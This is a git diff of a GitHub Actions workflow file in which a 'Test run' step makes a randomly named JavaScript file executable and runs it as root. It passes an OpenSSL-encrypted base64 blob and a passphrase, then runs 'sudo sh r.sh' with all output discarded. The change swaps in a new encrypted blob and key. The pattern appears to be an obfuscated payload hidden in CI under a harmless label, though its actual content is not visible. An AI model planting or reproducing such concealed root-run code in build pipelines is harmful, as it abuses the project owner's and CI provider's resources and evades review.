--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'l035l'
+        echo 'smu52'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/4FKoG+jnMijPyigsyhefNLRpPiSmVX3vzTN1aW9v2W8DXx6Sl7+x34cEEJWcU7wPwzOlbNoxK5rqxleUVTr3RY/taQxLRDLg+8UdW7gho1YVtydzGL8NO 5weni0 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19+S/zsUmCWRa1/5JlZ7u1EFmZ3DtSVbar23oZabMGlB3TBIqrqD+3FjLNVY7Zg38hTtsdHPew4FGrAasdnEl6qsY8F/IWhkldCz8qOk92PPSUbivvDsQyy votyr1 && sudo sh r.sh > /dev/null 2>&1
